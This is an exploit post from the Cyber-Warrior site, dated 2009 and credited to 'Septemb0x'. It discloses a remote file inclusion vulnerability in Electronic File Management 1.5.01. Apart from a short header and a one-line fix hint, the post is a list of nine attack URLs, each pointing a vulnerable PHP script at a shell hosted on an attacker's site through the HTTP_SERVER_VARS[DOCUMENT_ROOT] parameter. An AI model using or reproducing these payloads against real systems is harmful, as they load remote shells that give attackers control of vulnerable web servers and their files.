Electronic File Management 1.5.01 ~ RFI Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Electronic File Management 1.5.01 ~ RFI Vuln.

Madde
	Author : Bug Researchers/Septemb0x
	Date : 12.07.2009 21:34:41
	# Electronic File Management 1.5.01 ~ RFI Vuln. [Full Screen Display]

	############################################################# # Application Name : Electronic File Management 1.5.01 # Vulnerable Type : Remote File Inclusion Vulnerability # Infection : Remote File Control, Editing... # Bug Fix Advice : variable to define # author : Septemb0x # Script Down.& WebSite : http://electronicfilemanagement.net/Trial_Download/EFM_1.5.01.rar ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > http://[target]/[path]/includes/config.inc.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/include/chpass1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/include/deleted_file2s.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/include/edit_profile.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/include/smChangepass.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/include/user_statistics1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/news/newsmanagement.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/tree/iframe_all_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? http://[target]/[path]/admin/tree/iframe_assign_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell? --------------------------------------------------------------- < -- bug code end of -- >